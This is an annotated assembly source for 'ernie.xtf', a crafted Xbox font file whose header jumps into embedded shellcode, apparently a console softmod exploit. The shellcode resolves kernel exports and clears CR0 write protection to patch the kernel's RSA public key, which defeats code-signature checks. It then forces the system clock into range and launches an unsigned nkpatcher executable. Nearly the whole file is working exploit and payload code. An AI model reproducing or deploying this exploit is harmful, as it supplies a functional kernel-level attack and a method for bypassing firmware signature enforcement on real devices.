;;;
;;; Compile: nasm -o ernie.xtf ernie.asm
;;;
; NASM, Intel syntax, 32-bit flat code. The code is position-independent:
; every data reference is written as [ebp+label-base] after `base` has
; loaded its own runtime address into ebp.
BITS 32
header:
db 'XTF0'                       ; 4-byte tag at the start of the file (presumably the XTF magic - confirm against the format)
dd 32                           ; header length field (value 32; meaning to be confirmed against the format)
db 'Xbox Book'
times 32-9 db 0                 ; pad the 9-byte name out to a 32-byte field
.data1len:
jmp short shellcode             ; a 2-byte relative jump is stored in this header field; lands on `shellcode` when executed
dw 10h
dd 0
.data2num:
dd 1 ; Can be tuned (to fill memory holes) in case of exploit instability
dd 0
shellcode:
jmp near start                  ; skip over the data that follows
align 4, db 0
; Kernel export ordinals, one dword each, terminated by a 0 dword.
; `getexports` overwrites each entry in place with the export's address
; (or leaves 0 when the export-table slot is empty), so after it runs
; [ebp+Name-base] is a pointer.
kexports:
HalReturnToFirmware dd 49
;HalWriteSMBusValue dd 50
LaunchDataPage dd 164
MmAllocateContiguousMemory dd 165
MmPersistContiguousMemory dd 178
XePublicKeyData dd 355
KeQuerySystemTime dd 128
NtSetSystemTime dd 228
RtlTimeFieldsToTime dd 304
dd 0                            ; end of table
; Eight 16-bit fields (see the per-field comments), passed to
; RtlTimeFieldsToTime in `clockcheck` as the lower and upper bounds of the
; accepted system time.
mintimefields
dw 2022 ; Year
dw 1 ; Month
dw 1 ; Day
dw 12 ; Hour
dw 0 ; Minute
dw 0 ; Second
dw 0 ; Milliseconds
dw 0 ; Weekday (ignored)
maxtimefields
dw 9999 ; Year
dw 1 ; Month
dw 1 ; Day
dw 12 ; Hour
dw 0 ; Minute
dw 0 ; Second
dw 0 ; Milliseconds
dw 0 ; Weekday (ignored)
xbestr db '\Device\Harddisk0\Partition2\nkpatcher;default.xbe',0 ; NUL-terminated path copied into the launch data page by `launchxbe`
times 8 db 0                    ; trailing zero padding; included in XBESTRLEN
XBESTRLEN equ $-xbestr          ; byte count from xbestr to here (string + NUL + 8 pad bytes)
;-----------------------------------------------------------------------
; start: entry point, reached via `jmp near start` from the header.
; Establishes the position-independent base register, then resolves the
; kexports ordinal table against the kernel's PE export directory.
;
; Register roles on exit (relied on by the code that follows):
;   ebp = runtime address of `base` (data is referenced as [ebp+label-base])
;   esi = kernel image base (80010000h)
;   edi = one past the end of the kexports table
; Clobbers eax, ebx, ecx, edx, flags.
;-----------------------------------------------------------------------
start:
call base
base:
pop ebp                         ; ebp = address of `base` (call/pop get-PC idiom)
cld                             ; stosd/movsb in this file must advance forward
mov esi,80010000h ; Kernel here
mov eax,[esi+3Ch]               ; e_lfanew: offset of the PE header from the DOS header
mov ebx,[esi+eax+78h]           ; RVA of the export directory (first data-directory entry, PE32 layout)
add ebx,esi                     ; ebx = IMAGE_EXPORT_DIRECTORY*
mov edx,[ebx+1Ch]               ; RVA of AddressOfFunctions
add edx,esi                     ; edx = table of function RVAs
lea edi,[ebp+kexports-base]     ; edi = first ordinal; also the stosd store pointer
; Resolve each ordinal in place:
;   table[i] = rva ? rva + kernel base : 0, where rva = AddressOfFunctions[ordinal - Base]
; There is no bounds check against NumberOfFunctions, so an ordinal outside
; the exported range reads past the table.
getexports:
mov ecx,[edi]                   ; next ordinal
jecxz .done                     ; a 0 entry terminates the table
sub ecx,[ebx+10h]               ; index = ordinal - export Base
mov eax,[edx+4*ecx]             ; function RVA (0 for an unused slot)
test eax,eax
jz .empty                       ; keep the 0 so a caller can test for a missing export
add eax,esi                     ; RVA -> virtual address
.empty:
stosd                           ; overwrite the ordinal with the resolved address; edi += 4
jmp getexports
.done:
; blinkled:
; mov edi,[ebp+HalWriteSMBusValue-base]
; push 0A0h
; push byte 0
; push byte 8
; push byte 20h
; call edi
; push byte 1
; push byte 0
; push byte 7
; push byte 20h
; call edi
;-----------------------------------------------------------------------
; patchpublickey: locate the kernel's RSA public key blob and overwrite
; one dword of it in place.
; In:  ebp = base, esi = kernel base (both from `start`),
;      [ebp+XePublicKeyData-base] = resolved export address, or 0
; Clobbers ebx, ecx, esi (advanced while scanning), flags.
; Requires ring 0: reads and writes CR0 and executes cli.
;-----------------------------------------------------------------------
patchpublickey:
mov ebx,[ebp+XePublicKeyData-base]
test ebx,ebx
jnz .chk                        ; export resolved: test that address first
.searchkey:
mov ebx,esi                     ; otherwise (or if the check fails) scan kernel memory byte by byte from esi
inc esi
.chk:
cmp dword [ebx],31415352h       ; 'RSA1' blob tag
jne .searchkey
cmp dword [ebx+10h],10001h      ; 65537 - presumably the public-exponent field
jne .searchkey
; Neither scan loop has an upper bound: if a pattern is never found the
; loop walks off the end of the kernel image.
.searchkeyend:
inc ebx                         ; scan forward from the key start for the dword to patch
cmp dword [ebx],0A44B1BBDh
jne .searchkeyend
pushf
cli                             ; no interrupts while write protection is off
mov ecx,cr0
push ecx                        ; save CR0
and ecx,0FFFEFFFFh              ; clear CR0.WP (bit 16) so the read-only page accepts the store
mov cr0,ecx
xor dword [ebx],2DD78BD6h       ; patch the located dword in place
pop ecx
mov cr0,ecx                     ; restore CR0 (WP back on)
popf                            ; restore the interrupt flag
;-----------------------------------------------------------------------
; clockcheck: keep the system clock inside [mintimefields, maxtimefields).
; Reads the current time; if it is below the minimum, or at or above the
; maximum, sets it to the minimum. If either RtlTimeFieldsToTime call
; fails the clock is left untouched. The kernel calls appear to be
; stdcall: no caller-side stack cleanup follows them.
; In:    ebp = base; resolved pointers in kexports.
; Stack: three 8-byte slots (current / min / max), released at the end.
; Clobbers eax, ebx, ecx, edx, esi, edi, flags.
;-----------------------------------------------------------------------
clockcheck:
xor eax,eax
push eax
push eax
mov ebx,esp ; space for current time
push eax
push eax
mov esi,esp ; space for minimum time
push eax
push eax
mov edi,esp ; space for maximum time
push ebx
call dword [ebp+KeQuerySystemTime-base]      ; KeQuerySystemTime(&cur)
push esi
lea eax,[ebp+mintimefields-base]
push eax
call dword [ebp+RtlTimeFieldsToTime-base]    ; RtlTimeFieldsToTime(&mintimefields, &min)
test eax,eax
jz .bailout                                  ; conversion failed: leave the clock alone
mov eax,[ebx]
mov edx,[ebx+4]
sub eax,[esi]                                ; 64-bit cur - min
sbb edx,[esi+4]
jc .setclock                                 ; borrow => cur < min
push edi
lea eax,[ebp+maxtimefields-base]
push eax
call dword [ebp+RtlTimeFieldsToTime-base]    ; RtlTimeFieldsToTime(&maxtimefields, &max)
test eax,eax
jz .bailout
mov eax,[ebx]
mov edx,[ebx+4]
sub eax,[edi]                                ; 64-bit cur - max
sbb edx,[edi+4]
jc .clockok                                  ; borrow => cur < max: in range, nothing to do
.setclock:
push byte 0
push esi
call dword [ebp+NtSetSystemTime-base]        ; NtSetSystemTime(&min, NULL); return value is not checked
.clockok:
.bailout:
add esp,byte 8+8+8                           ; drop the three time slots
;-----------------------------------------------------------------------
; launchxbe: fill the launch data page with the xbestr path and hand
; control to the firmware. Does not return.
; In:  ebp = base; resolved pointers in kexports.
; Clobbers eax, ebx, ecx, esi, edi, flags.
;-----------------------------------------------------------------------
launchxbe:
mov esi,[ebp+LaunchDataPage-base]            ; esi = address of the LaunchDataPage variable (holds the page pointer)
mov edi,1000h                                ; page size in bytes
mov ebx,[esi]
test ebx,ebx
jnz .memok                                   ; page already allocated
push edi
call dword [ebp+MmAllocateContiguousMemory-base] ; MmAllocateContiguousMemory(1000h)
mov ebx,eax                                  ; NOTE(review): a NULL return is not checked; the stores below would then go to address 0
mov [esi],eax
.memok:
push byte 1
push edi
push ebx
call dword [ebp+MmPersistContiguousMemory-base]  ; MmPersistContiguousMemory(page, 1000h, 1)
mov edi,ebx
xor eax,eax
mov ecx,400h
rep stosd                                    ; zero the whole page (400h dwords)
or dword [ebx],byte -1                       ; first dword = 0FFFFFFFFh
mov [ebx+4],eax                              ; second dword = 0 (eax is still 0 after rep stosd)
lea edi,[ebx+8]
lea esi,[ebp+xbestr-base]
push byte XBESTRLEN
pop ecx                                      ; ecx = XBESTRLEN via push/pop (shorter than mov ecx,imm32)
rep movsb                                    ; copy the path, its NUL and the padding to page+8
push byte 2
call dword [ebp+HalReturnToFirmware-base]    ; HalReturnToFirmware(2)
.inf:
jmp short .inf                               ; not expected to be reached; spin forever